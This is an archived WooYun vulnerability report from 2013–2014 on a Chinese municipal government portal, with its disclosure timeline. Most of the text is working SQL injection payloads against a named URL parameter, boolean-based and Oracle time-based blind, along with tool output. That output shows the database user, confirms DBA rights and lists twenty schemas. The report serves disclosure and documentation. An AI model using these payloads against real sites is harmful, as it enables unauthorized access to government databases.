乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-25: 细节已通知厂商并且等待厂商处理中 2013-12-30: 厂商已经确认,细节仅向厂商公开 2014-01-09: 细节向核心白帽子及相关领域专家公开 2014-01-19: 细节向普通白帽子公开 2014-01-29: 细节向实习白帽子公开 2014-02-08: 细节向公众公开
Oracle盲注漏洞(高权限)
浙江省江山市人民政府门户网站 http://www.czjs.gov.cn盲注点比较隐秘:http://www.czjs.gov.cn/egov/was/web/jsbsdt/common.jsp?url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B
1.当前账户:
---Place: GETParameter: serviceid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B' AND 7451=7451 AND 'YeDp'='YeDp Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B' AND 1698=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(78)||CHR(75)||CHR(109),5) AND 'zxLQ'='zxLQ---current user: 'WAS_201201'
2.DBA:
---Place: GETParameter: serviceid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B' AND 7451=7451 AND 'YeDp'='YeDp Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B' AND 1698=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(78)||CHR(75)||CHR(109),5) AND 'zxLQ'='zxLQ---current user is DBA: 'True'
3.可跨库,涉及20个数据库:
---Place: GETParameter: serviceid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B' AND 7451=7451 AND 'YeDp'='YeDp Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B' AND 1698=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(78)||CHR(75)||CHR(109),5) AND 'zxLQ'='zxLQ---available databases [20]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] UCAP_201201[*] WAS_201201[*] WMSYS[*] XDB
危害等级:中
漏洞Rank:10
确认时间:2013-12-30 12:22
暂无